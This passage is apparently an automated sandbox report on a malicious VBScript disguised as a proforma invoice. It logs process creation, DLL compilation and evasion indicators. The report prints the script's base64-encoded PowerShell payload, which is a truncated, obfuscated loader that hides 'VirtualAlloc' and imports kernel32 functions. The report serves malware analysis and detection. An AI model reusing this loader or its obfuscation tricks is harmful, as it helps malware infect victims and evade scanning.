ACAARgBlAHIAaQBlAGwAdQBrAG4AIABSAGUAeQBrACAAQwBoAGEAcwBzAGUAcgAgAEUAcQB1AGEAbABsAGkAIABGAG8AcgBzAHQAZQBuACAAbQB1AHMAawBpACAAVQBuAHAAZQBlAGwAIABTAHAAZQBrAHQAYQAgAEoAdQBuAGcAbQBhAG4AZAB1AG4AIABpAG4AZAB1AGsAdAAgAEkAcwBvAGwAIABTAGsAZQBsAG4AZQBtAHIAawAgAEQAZwBuAGYAbAAgAEYAbwBsAGsAZQByAGUAIABBAGYAcABhAHMAbgAgAEQAYQBsAGwAeQAgAEwAYQBuAGQAZwBhAG4AZwBzACAASABlAG4AcgBpAGsAcwBlAG4AIABNAG8AbABiAG8AaABpAHMAIABTAGEAbgBlAHIAaQBuAGcAIABHAHIAdQB0AG4AIABTAHQAYQBrAGwAYQBkAGUAcgBuACAAQQByAGMAaAAgAA0ACgAkAEMAMwAyACAAPQAgAFsAYwBoAGEAcgBdADMANAAgACsAIAAiAFoAIgAgACsAIAAiAHcAQQAiACsAIgBsAGwAIgArACIAbwBjACIAKwAiAGEAdABlAFYAaQByACIAKwAiAHQAdQBhAGwATQAiACsAIgBlACIAKwAiAG0AIgArACIAbwByAHkAIgAgACsAIABbAGMAaABhAHIAXQAzADQADQAKACMAQwBvAG0AbQBhAG4AZABpAG4AZwAgAHUAbgBkAGUAcgBiAGUAIABBAHAAbwByAHIAIABVAG4AZgB1AHQAaQBsACAASgB1AGwAaQBhAG4AaQBzAHQAYgAgAEIAYQBnAGsAbABkAG4AaQBuAGcAIABTAGUAcgBlAG4AIABDAG8AbgB2ACAATwBzAHQAZQBvAHAAbABhACAAVQBuAHAAcgBlAGYAZQByAGEAIABTAGEAbQBtAGUAIABTAGUAbQBpAHMAcABpAHIAYQAgAFIAZQBnAGUAbgBzAGkAYQBuAGUAIABGAGUAaABzAG8AIABTAGsAbwB2ACAASwBvAG0AcABsAGUAdAB0AGUAIABSAGUAZABzAGUAIABEAGkAcwBwAHUAdABkAGEAZwAgAEYAYQB1AGMAIABTAGUAbQBpACAAZwBhAGwAYQBjAHQAIABOAG8AcgBvAHAAaQBhAG4AaQBjACAATQBpAGwAbABpAHMAZQBrAHUAbgAgAEIAZQBnAHIAZQBiAHMAZAAgAEsAZABmAGEAcgAgAE0AaQBzAG8AZwB5ACAAVABvAHAAZgBvAHIAcwBwACAAQwBwAHIAZgAgAGwAaQB2AHMAYgBlAHQAaQAgAE8AcgBkAHIAZQAgAE0AbABkAGUAaQBuAG8AZABvACAARQBrAHMAYQBtAGUAbgAgAFUAZABkAGEAbgBuAGUAbABzAGUAIAANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABTAGsAeQBkADEADQAKAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAARQBuAHUAbQBUAGkAbQBlAEYAbwByAG0AYQB0AHMAQQAoAHUAaQBuAHQAIABEAGUAcgBpAHYAYQB0AGkAdgB0ADUALABpAG4AdAAgAEQAZQByAGkAdgBhAHQAaQB2AHQANgAsACAAaQBuAHQAIABEAGUAcgBpAHYAYQB0AGkAdgB0ADcAKQA7AA0ACgANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUA
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\b0raocps\b0raocps.cmdline
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESED66.tmp" "c:\Users\user\AppData\Local\Temp\b0raocps\CSC533D9109F058485082AFE99DFE1364C9.TMP"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBOAGUAbABzACAAUABhAHIAYQBwAHMAeQBrACAAQQBuAHQAaQBoACAARAB1AGQAZQBsAHMAYQBjACAAZABlAHMAdQBsACAATQB1AHIAcABoAGkAZQBkACAATQBsAGQAcgAgAEwAbwB1AHQAaABlACAAQQBjAGMAdQBtAGIAZQBuAHQAawAgAFAAZQBjAHQAbwByAGEAbABpAHMAIABEAHUAdgBlAHQAIABPAHAAcwBwAHIAdABuACAAbgBlAGQAZABpAGUAcwAgAFUAZABzAHYAaQBuAGcAIABBAG4AYQBsAHkAcwBlAGEAIABGAGEAcgBlAHMAZwBsAG8AIABEAGUAbQBhAHIAIABCAGwAdQBlAGIAZQBsACAAQwBvAHUAcgBpAGQAYQBoACAAbwBmAGYAbABpAGMAIAANAAoAIwBSAHUAbABsAGUAcwB0ACAATABhAGMAaAByAHkAbQBhAHQAIABCAGEAcgB5AHQAaAB5AG0AIABNAGEAcgBpAHMAIAB0AG8AbABzAGUAeQBrAHUAbAAgAFUAdQBkAHMAbAB1AGsAawBlACAAUwBhAHQAcwBiAGkAbABsAGUAIABBAGwAdgBpAGQAZQBuAGQAIABVAGQAZwBhAG4AZwBzAGYAbwByACAAVgBlAGQAZwBhACAARgBlAHIAaQBlAGwAdQBrAG4AIABSAGUAeQBrACAAQwBoAGEAcwBzAGUAcgAgAEUAcQB1AGEAbABsAGkAIABGAG8AcgBzAHQAZQBuACAAbQB1AHMAawBpACAAVQBuAHAAZQBlAGwAIABTAHAAZQBrAHQAYQAgAEoAdQBuAGcAbQBhAG4AZAB1AG4AIABpAG4AZAB1AGsAdAAgAEkAcwBvAGwAIABTAGsAZQBsAG4AZQBtAHIAawAgAEQAZwBuAGYAbAAgAEYAbwBsAGsAZQByAGUAIABBAGYAcABhAHMAbgAgAEQAYQBsAGwAeQAgAEwAYQBuAGQAZwBhAG4AZwBzACAASABlAG4AcgBpAGsAcwBlAG4AIABNAG8AbABiAG8AaABpAHMAIABTAGEAbgBlAHIAaQBuAGcAIABHAHIAdQB0AG4AIABTAHQAYQBrAGwAYQBkAGUAcgBuACAAQQByAGMAaAAgAA0ACgAkAEMAMwAyACAAPQAgAFsAYwBoAGEAcgBdADMANAAgACsAIAAiAFoAIgAgACsAIAAiAHcAQQAiACsAIgBsAGwAIgArACIAbwBjACIAKwAiAGEAdABlAFYAaQByACIAKwAiAHQAdQBhAGwATQAiACsAIgBlACIAKwAiAG0AIgArACIAbwByAHkAIgAgACsAIABbAGMAaABhAHIAXQAzADQADQAKACMAQwBvAG0AbQBhAG4AZABpAG4AZwAgAHUAbgBkAGUAcgBiAGUAIABBAHAAbwByAHIAIABVAG4AZgB1AHQAaQBsACAASgB1AGwAaQBhAG4AaQBzAHQAYgAgAEIAYQBnAGsAbABkAG4AaQBuAGcAIABTAGUAcgBlAG4AIABDAG8AbgB2ACAATwBzAHQAZQBvAHAAbABhACAAVQBuAHAAcgBlAGYAZQByAGEAIABTAGEAbQBtAGUAIABTAGUAbQBpAHMAcABpAHIAYQAgAFIAZQBnAGUAbgBzAGkAYQBuAGUAIABGAGUAaABzAG8AIABTAGsAbwB2ACAASwBvAG0AcABsAGUAdAB0AGUAIABSAGUAZABzAGUAIABEAGkAcwBwAHUAdABkAGEAZwAgAEYAYQB1AGMAIABTAGUAbQBpACAAZwBhAGwAYQBjAHQAIABOAG8AcgBvAHAAaQBhAG4AaQBjACAATQBpAGwAbABpAHMAZQBrAHUAbgAgAEIAZQBnAHIAZQBiAHMAZAAgAEsAZABmAGEAcgAgAE0AaQBzAG8AZwB5ACAAVABvAHAAZgBvAHIAcwBwACAAQwBwAHIAZgAgAGwAaQB2AHMAYgBlAHQAaQAgAE8AcgBkAHIAZQAgAE0AbABkAGUAaQBuAG8AZABvACAARQBrAHMAYQBtAGUAbgAgAFUAZABkAGEAbgBuAGUAbABzAGUAIAANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABTAGsAeQBkADEADQAKAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAARQBuAHUAbQBUAGkAbQBlAEYAbwByAG0AYQB0AHMAQQAoAHUAaQBuAHQAIABEAGUAcgBpAHYAYQB0AGkAdgB0ADUALABpAG4AdAAgAEQAZQByAGkAdgBhAHQAaQB2AHQANgAsACAAaQBuAHQAIABEAGUAcgBpAHYAYQB0AGkAdgB0ADcAKQA7AA0ACgANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\b0raocps\b0raocps.cmdlineJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESED66.tmp" "c:\Users\user\AppData\Local\Temp\b0raocps\CSC533D9109F058485082AFE99DFE1364C9.TMP"Jump to behavior
    Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5116:120:WilError_01
    Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\Unclear Proforma Invoice.vbs"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\20220808Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xkdnk0ke.qps.ps1Jump to behavior
    Source: classification engineClassification label: mal80.troj.evad.winVBS@8/8@0/1
    Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
    Source: Binary string: k7C:\Users\user\AppData\Local\Temp\b0raocps\b0raocps.pdb source: powershell.exe, 00000004.00000002.801494394.000000000549D000.00000004.00000800.00020000.00000000.sdmp

    Data Obfuscation

    barindex
    Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: ShellExecute("C:\Windows\SysWOW64\WindowsPowerShell\v", "-EncodedCommand "IwBOAGUAbABzACAAUABhAH", "", "", "0")
    Source: Yara matchFile source: 00000004.00000002.825442498.0000000009710000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\b0raocps\b0raocps.cmdline
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\b0raocps\b0raocps.cmdlineJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\b0raocps\b0raocps.dllJump to dropped file
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5769Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1280Thread sleep time: -15679732462653109s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1280Thread sleep time: -922337203685477s >= -30000sJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\b0raocps\b0raocps.dllJump to dropped file
    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: powershell.exe, 00000004.00000002.804163469.00000000055C9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: k:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
    Source: powershell.exe, 00000004.00000002.804163469.00000000055C9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V
    Source: powershell.exe, 00000004.00000002.796874902.0000000005265000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: k:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-Vom
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

    HIPS / PFW / Operating System Protection Evasion

    barindex
